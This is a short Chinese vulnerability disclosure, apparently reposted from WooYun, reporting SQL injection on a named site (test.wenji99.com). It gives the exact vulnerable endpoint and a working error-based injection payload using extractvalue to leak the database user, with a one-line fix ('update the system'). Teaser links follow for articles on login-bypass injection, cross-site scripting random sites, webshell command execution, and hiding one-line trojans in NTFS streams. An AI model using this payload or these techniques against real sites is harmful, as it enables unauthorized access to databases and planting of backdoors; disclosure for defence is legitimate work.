文集网某站存在SQL注入漏洞_网站安全

文集网某站存在SQL注入漏洞

漏洞影响网站

http://test.wenji99.com

注入点

http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate

POST参数

catid=12313213131313113) and extractvalue(1,concat(0x7e7e7e,user(),0x7e7e7e))%23

WooYun: mallbuilder多用户商城最新版SQL注入(四)

获取到的数据库当前用户信息：[email protected]

解决方案：

更新系统

如您对本文有疑问或者有任何想说的，请点击进行留言回复，万千网友为您解惑！

一：古老的OR注入漏洞。看一下首页，做的好凑合。有个登陆的地方，如图1. 二话不说，试’or’=’or’, 点击登陆。没想... [阅读全文]

目前网上有种新的趋势，黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所，而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同，因此对大家的网... [阅读全文]

最近朋友们老是弄些跨站,一会看这个站被跨站那个站又被跨站,我看也无聊顺便弄一些玩玩,到百度上随便搜索了几个站的地址结果一测试全都可以弄,这不得不让... [阅读全文]

在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言，安全性真的能够让人放心吗？面对层出不穷的黑客攻击和病毒袭击，JSP网站的服务器能够比其他网站的服务... [阅读全文]

webshell下执行CMD的小技巧分享，需要的朋友可以参考下。... 11-03-31 [阅读全文]

命令行下能很好的隐藏，但图形界面下虽然显示为空白，但细心的管理员还是能发现。只为交流学习，不建议搞破坏。... 11-11-11 [阅读全文]

CC攻击（Challenge Collapsar）是DDOS（分布式拒绝服务）的一种，也是一种常见的网站攻击方法，攻击者通过代理服务器或者肉鸡向向受害主机不停地... [阅读全文]

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍... [阅读全文]

应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入了一句话木马。XXOO。... 11-09-29 [阅读全文]

利用ntfs流隐藏你的一句话木马的方法，好邪恶啊，大家一定要注意防范啊。建议服务器安全设置弄好。... 11-09-29 [阅读全文]


验证码：

验证码：

文集网某站存在SQL注入漏洞